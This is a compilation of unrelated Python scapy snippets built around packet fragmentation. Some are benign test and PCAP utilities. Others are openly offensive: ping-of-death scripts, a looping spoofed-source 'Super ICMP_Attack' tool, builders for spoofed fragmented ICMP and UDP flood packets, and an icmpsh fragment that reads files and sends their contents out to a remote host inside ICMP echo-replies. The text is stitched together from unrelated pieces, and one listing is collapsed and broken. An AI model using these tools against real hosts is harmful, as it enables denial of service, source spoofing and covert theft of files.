def run(self, hosts):
    """Probe every host with one large, fragmented ICMP echo request.

    For each entry in *hosts* an ``IP / ICMP`` packet carrying 60000 filler
    bytes is built, split with scapy's ``fragment()`` and handed to
    ``self.send_receive`` with a two-second timeout.

    The reassembled datagram (20-byte IP header + 8-byte ICMP header +
    60000 bytes) stays within the 65,535-byte IPv4 limit, so this is a
    large but valid echo request.  Many firewalls drop fragmented ICMP,
    so a missing reply does not prove the host is down.
    """
    filler = "X" * 60000
    for target in hosts:
        echo_request = IP(dst=str(target)) / ICMP() / filler
        # NOTE(review): `resp` is not used in the visible code; the listing
        # presumably continues past this point.
        resp = self.send_receive(fragment(echo_request), timeout=2, verbose=0)
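def main():
    """Fragment oversized IPv4 packets from one PCAP file into another.

    Every frame of ``input_file`` is parsed as Ethernet.  A frame whose
    second layer is IPv4, whose third layer is longer than
    ``--fragment-size`` and whose Don't Fragment bit is clear is replaced
    by its fragments; every frame, fragmented or not, is written to
    ``output_file``.
    """
    parser = argparse.ArgumentParser(
        description='Fragments the IPv4 packets in the given PCAP file '
        'and writes the results to another file.')
    parser.add_argument('input_file')
    parser.add_argument('output_file')
    parser.add_argument(
        '--fragment-size', '-s', type=int, default=500,
        help='Fragment size. Packets larger than this are fragmented '
        'if their df flag is not set. Defaults to 500.')
    args = parser.parse_args()

    # Don't Fragment is value 2 in the IPv4 flags field (MF is 1).
    df_bit = 0x2

    reader = RawPcapReader(args.input_file)
    try:
        writer = PcapWriter(args.output_file, append=False, sync=True)
        try:
            for pkt_data in reader:
                p = Ether(pkt_data[0])
                # The original tested `flags & 2 != 0`, which selected packets
                # WITH DF set -- the opposite of what the help text promises.
                # NOTE(review): p[1] / p[2] raise IndexError on frames that
                # lack those layers; confirm the input never contains such.
                if (isinstance(p[1], IP)
                        and len(p[2]) > args.fragment_size
                        and (p[1].flags & df_bit) == 0):
                    p = fragment(p, args.fragment_size)
                    print('Fragmented packet into {} fragments.'.format(len(p)))
                writer.write(p)
        finally:
            # Release the output handle even if a frame fails to parse.
            writer.close()
    finally:
        reader.close()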
def send_packet(packet):
    """Forward *packet* to the other of the two MAC addresses in ``macs``.

    Frames whose Ethernet source is not listed in ``macs`` are ignored.
    Otherwise the destination is rewritten to the other entry, the packet
    is split with scapy's ``fragment()`` and each piece is sent at layer 2.
    """
    origin = packet[Ether].src
    if origin not in macs:
        return

    # Deleting a scapy field resets it to its default, so the source MAC and
    # the IP checksum are filled in again when the frame is built.
    del packet[Ether].src
    del packet[IP].chksum

    # `macs` is treated as a two-element list: index 0 <-> index 1.
    peer_slot = (macs.index(origin) + 1) % 2
    packet[Ether].dst = macs[peer_slot]

    for piece in fragment(packet):
        sendp(piece, verbose=0)
def sendPerSecond(timestamp,ip,dataSize,mac,packets):
    """Fragment one zero-filled packet from *ip* and append it to *packets*.

    Prints two timing lines: the time spent fragmenting and the time spent
    extending the list.  `timestamp` and `mac` are unused in the visible code.
    """
    # NOTE(review): line breaks were reconstructed from a collapsed listing;
    # `p` and `size` are not defined in this snippet and are presumably
    # module-level names -- confirm against the full file.
    # p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize);
    t=time();
    p['IP'].src=ip;
    # ''.zfill(n) yields a string of n '0' characters used as filler payload.
    p2=fragment(p/''.zfill(dataSize))
    print(str(size)+','+str(time()-t))
    t=time();
    packets.extend(p2);
    print(str(size)+','+str(time()-t))
    # This last timestamp is not read again in the visible code.
    t=time();
def generate_ip4_frags(self, payload_length, fragment_size):
    """Build a fragmented IP-in-IP test frame and the matching inner packet.

    Returns:
        A ``(frags, p4_reply)`` tuple: the scapy fragments of
        ``Ether / outer IP / inner IP / UDP / payload`` and the inner
        ``IP / UDP / payload`` packet with its TTL lowered by one
        (presumably what the far side should see after one forwarding hop).
    """
    eth_hdr = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
    udp_datagram = UDP(sport=1234, dport=1234) / self.payload(payload_length)
    inner_hdr = IP(src="1.2.3.4", dst=self.pg0.remote_ip4)
    # A random IP ID on the outer header keeps separate calls from sharing
    # an identification value.
    tunnel_hdr = IP(src=self.pg1.remote_ip4,
                    id=RandShort(),
                    dst=self.pg0.local_ip4)

    encapsulated = eth_hdr / tunnel_hdr / inner_hdr / udp_datagram
    frags = fragment(encapsulated, fragment_size)

    p4_reply = inner_hdr / udp_datagram
    p4_reply.ttl -= 1
    return frags, p4_reply
def generate_ip4_frags(self, payload_length, fragment_size):
    """Return fragments of an encapsulated IPv4 frame and the expected inner packet.

    The frame is ``Ether / outer IP / inner IP / UDP / payload``; it is split
    with scapy's ``fragment()`` at *fragment_size*.  The second return value
    is the inner ``IP / UDP / payload`` with its TTL decremented once.
    """
    link = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
    datagram = UDP(sport=1234, dport=1234) / self.payload(payload_length)
    inner = IP(src="1.2.3.4", dst=self.pg0.remote_ip4)
    outer = IP(src=self.pg1.remote_ip4, id=RandShort(), dst=self.pg0.local_ip4)

    frags = fragment(link / outer / inner / datagram, fragment_size)

    # The inner packet is rebuilt separately so that lowering its TTL does
    # not touch the frame that was just fragmented.
    p4_reply = inner / datagram
    p4_reply.ttl -= 1
    return frags, p4_reply
def build_fragmented_icmp_packet(destination_ip):
    """Generate fragmented ICMP packet with spoofed source IP address.

    Argument:
    destination_ip -- the IP address of the target

    Returns the list of fragments produced by scapy's ``fragment()``.
    """
    # Random source address, IP ID and ICMP ID; TTL, payload (1500..65500
    # units per the keyword arguments) and fragment size come from
    # packet_builder.
    # Defender's view: packets with forged sources are dropped by networks
    # that enforce ingress/egress source validation (BCP 38 / uRPF), and any
    # replies go to the forged addresses rather than to the sender.
    ip_header = IP(src=RandIP(), dst=destination_ip, id=RandShort(),
                   ttl=packet_builder.generate_ttl())
    echo_header = ICMP(id=RandShort())
    body = packet_builder.generate_payload(min_count=1500, max_count=65500)
    frag_size = packet_builder.generate_fragsize()
    return fragment(ip_header / echo_header / body, fragsize=frag_size)
def build_fragemneted_udp_packet(destination_ip, destination_port):
    """Generate fragmented UDP packet with random source port and spoofed
    source IP address.

    Arguments:
    destination_ip -- the IP address of the target
    destination_port -- the target's port to which the packet will be sent

    Returns the list of fragments produced by scapy's ``fragment()``.
    """
    # Only the first fragment of a datagram carries the UDP header, so
    # port-based filters that do not reassemble see ports on that fragment
    # alone.  Forged sources are dropped where source validation
    # (BCP 38 / uRPF) is enforced.
    ip_header = IP(src=RandIP(), dst=destination_ip, id=RandShort(),
                   ttl=packet_builder.generate_ttl())
    udp_header = UDP(sport=RandShort(), dport=destination_port)
    body = packet_builder.generate_payload(min_count=1500, max_count=65500)
    frag_size = packet_builder.generate_fragsize()
    return fragment(ip_header / udp_header / body, fragsize=frag_size)
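def send_packet(self, packet, **kwargs):
    """Forge an IP packet around *packet* and transfer it, fragmenting if needed.

    Per the original author's note: if the destination is an IP the packet
    is just transferred; if it is a domain name, resolution is attempted
    and the packet is otherwise pooled while a DNS request is triggered.
    None of that is visible here -- it presumably happens inside
    ``transfer_packet``.

    Keyword arguments:
    IP -- optional dict of IP-layer fields passed to ``forge_packet``; an
          ``id`` is added to it when the caller supplied none.
    """
    # `dict.has_key` no longer exists in Python 3; `in` behaves the same on
    # both major versions.
    if "IP" not in kwargs:
        kwargs["IP"] = {}
    ip_fields = kwargs["IP"]
    if "id" not in ip_fields:
        # The ID is fixed before forging, presumably so that every fragment
        # of the datagram carries the same identification value.
        ip_fields["id"] = random.randrange(1, 65535)

    p = self.forge_packet(packet, **ip_fields)
    if len(p) <= self.MTU:
        self.transfer_packet(p, **kwargs)
        return

    # NOTE(review): scapy's `fragsize` bounds the IP payload carried by each
    # fragment, so a fragment plus its IP header can exceed self.MTU --
    # confirm whether the header length should be subtracted here.
    for frag in fragment(p, fragsize=self.MTU):
        self.transfer_packet(frag, **kwargs)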
def fragment(self, original, fragsize):
    """
    Split a packet in two, the first piece holding bytes 0:fragsize.

    Always returns exactly two packets: surplus fragments are merged into
    the second one, and a packet too small to split is duplicated.
    """
    # Assuming this is a method on a class, the bare name `fragment` below
    # resolves to the module-level scapy function, not to this method.
    pieces = [original] if fragsize == 0 else fragment(original, fragsize=fragsize)

    count = len(pieces)
    if count == 1:
        # Only enough bytes for one packet (or fragsize == 0): duplicate it.
        pieces.append(pieces[0].copy())
    elif count > 2:
        # Fold the load of every surplus fragment into the second packet.
        for extra in pieces[2:]:
            pieces[1]["IP"].load += extra["IP"].load
        # Per the original author, scapy leaves "MF+DF" set on this
        # fragment; as it is now the last one, "MF" is stripped so the
        # packet stays valid.
        pieces[1]["IP"].flags = "DF"

    return pieces[0], pieces[1]
def Ping_attack():
    """Prompt for a target and send it a fragmented ICMP echo every two seconds.

    Runs until interrupted with Ctrl+C.  Each echo carries 2000 filler bytes
    and a source address taken from ``scapy.RandIP()``.

    Defender's view: the forged source means replies never reach the sender,
    and such packets are dropped by networks that enforce source-address
    validation (BCP 38 / uRPF).  One small datagram every two seconds is a
    negligible load for the receiver.
    """
    os.system('clear')
    for banner_line in (
        "**************************************",
        " Super ICMP_Attack",
        "**************************************",
        "please input your attack target's IP",
    ):
        print(banner_line)

    target = input("[Super ICMP_attack]#")
    srcip = scapy.RandIP()
    attack_numbers = 0
    try:
        while True:
            echo = scapy.IP(src=srcip, dst=target) / scapy.ICMP() / ("X" * 2000)
            scapy.send(scapy.fragment(echo), verbose=False)
            attack_numbers += 1
            print("[+]Attack Number is " + str(attack_numbers))
            time.sleep(2)
    except KeyboardInterrupt:
        print("[-]Ctrl + C detected.....")
def send(self, packet):
    # Wrap `packet` in IP/UDP, fragment it, and write each fragment to
    # self.sock as a 4-byte big-endian length followed by the fragment bytes.
    # Python 2 code (print statements, `except X,e`).
    # NOTE(review): indentation was reconstructed from a collapsed listing;
    # the nesting of the hexdump() calls and of the raw_send block is the
    # most plausible reading -- confirm against the original file.
    original_packet = IP(dst=self.target_ip,src=self.return_ip)/UDP(dport=self.target_port,sport=self.return_port)/packet
    if self.verbose > 1:
        print "Original packet:"
        original_packet.show()
        hexdump(str(original_packet))
    fragments = fragment(original_packet, fragsize = self.fragment_size)
    try:
        # 1-based counter used only for the progress and log messages.
        i = 1
        for frag in fragments:
            if self.verbose > 1:
                print "Fragment %d of %d:" % (i, len(fragments))
                frag.show()
            # Under Python 2, str() on a scapy packet yields its raw bytes.
            frag = str(frag)
            # Length prefix: unsigned 32-bit, network byte order.
            length = struct.pack(">I", len(frag))
            # Connect lazily, only when there is no socket yet.
            if not self.sock:
                print '[+] connecting ...'
                self.sock = self.create()
            print '[+] sending part %d of %d now..' % (i, len(fragments))
            hexdump(frag)
            if self.log:
                self.log.packet('sending fragment %d of %d' % (i, len(fragments)), frag)
            self.sock.send(length)
            self.sock.send(frag)
            if self.log:
                self.log('sent fragment %d of %d' % (i, len(fragments)))
            i += 1
            # With raw_send set, the connection is closed after each fragment.
            if self.raw_send:
                if self.log:
                    self.log('forcing a new connection due to raw_send flag')
                self.close()
    except KeyboardInterrupt,e:
        print "[-] keyboard interrupt while connecting/sending to redirector"
        raise KeyboardInterrupt,e
def run(self):
    """Send one fragmented ICMP echo of ``self.length`` filler bytes to ``self.ip``.

    Whether the reassembled datagram stays within the 65,535-byte IPv4
    limit depends on ``self.length``.  Current IP stacks reject fragments
    whose offset plus length would exceed that limit.
    """
    print("death pinging " + self.ip)
    headers = IP(dst=self.ip) / ICMP()
    filler = "V" * self.length
    send(fragment(headers / filler))
def sendPerSecond(timestamp, ip, dataSize, mac, packets):
    """Append the fragments of one *dataSize*-byte packet from *ip* to *packets*.

    `timestamp` and `mac` are accepted but not used here.
    """
    # The module-level `packetPrototype` is reused and mutated in place
    # (presumably Ether/IP/TCP, per the author's earlier per-call version:
    #  Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize)).
    packetPrototype['IP'].src = ip
    # ''.zfill(n) is a string of n '0' characters, used as filler payload.
    filler = ''.zfill(dataSize)
    packets.extend(fragment(packetPrototype / filler))
def POD(ip_addr, amt):
    """Send one fragmented ICMP echo with ``int(amt)`` filler bytes to *ip_addr*.

    Always returns 1.  Whether the reassembled datagram stays within the
    65,535-byte IPv4 limit depends on *amt*.  Current IP stacks reject
    fragments whose offset plus length would exceed that limit.
    """
    headers = IP(dst=ip_addr) / ICMP()
    filler = "X" * int(amt)
    send(fragment(headers / filler))
    return 1
#!/usr/bin/python
# This tool is for educational use only!
# Description: Ping of death
# Requirements: scapy + root privileges
#
# Usage: <script> <dst_ip>
#
# NOTE(review): the datagram built here is 20 (IP) + 8 (ICMP) + 60000 bytes,
# which stays within the 65,535-byte IPv4 limit.  It is therefore a large but
# valid echo request that exercises the receiver's reassembly path.

import sys

from scapy.all import send, fragment, IP, ICMP

if len(sys.argv) < 2:
    print("{0} <dst_ip>".format(sys.argv[0]))
    sys.exit(1)

target = sys.argv[1]
oversized_echo = IP(dst=target) / ICMP() / ("X" * 60000)
send(fragment(oversized_echo))
#!/usr/bin/python
# This tool is for educational use only!
# Description: Ping of death
# Requirements: scapy + root privileges
#
# Sends a single fragmented ICMP echo request with a 60000-byte payload to
# the address given as the first argument.  With the 20-byte IP header and
# 8-byte ICMP header the reassembled size is below the 65,535-byte IPv4
# maximum, so receivers treat it as an ordinary large ping.

import sys

from scapy.all import send, fragment, IP, ICMP

if len(sys.argv) >= 2:
    filler = "X" * 60000
    send(fragment(IP(dst=sys.argv[1]) / ICMP() / filler))
else:
    print("{0} <dst_ip>".format(sys.argv[0]))
    sys.exit(1)
infos = data[:6] filename = data[6:] dataUnpacked = unpack('IH',infos) offset = dataUnpacked[0] size = dataUnpacked[1] sys.stdout.write("Filename : " + filename + "\nOffset : " + str(offset) + "\n") try: f = open(filename) except: print "%s not found"%filename continue f.seek(offset) line = f.read(size) f.close() send(fragment(IP(dst=sys.argv[2]) / ICMP(type='echo-reply', id=ident, seq=seq_id) / (line))) except: if len(data) == 0: print "End" else: print "Invalid ICMP buffer" if __name__ == '__main__': if len(sys.argv) < 3: msg = 'missing mandatory options. Execute as root:\n' msg += './icmpsh_download_cli.py <source IP address> <destination IP address>\n' sys.stderr.write(msg) sys.exit(1) main(sys.argv[1], sys.argv[2])
def sendPerSecond(timestamp, ip, dataSize, mac, packets):
    """Fragment one zero-filled packet sourced from *ip* and queue it in *packets*.

    The shared module-level ``packetPrototype`` has its IP source rewritten
    in place.  `timestamp` and `mac` are not used.
    """
    # Earlier per-call construction kept by the author for reference:
    #   Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize)
    packetPrototype['IP'].src = ip
    padded = packetPrototype / ''.zfill(dataSize)  # payload of dataSize '0' chars
    pieces = fragment(padded)
    packets.extend(pieces)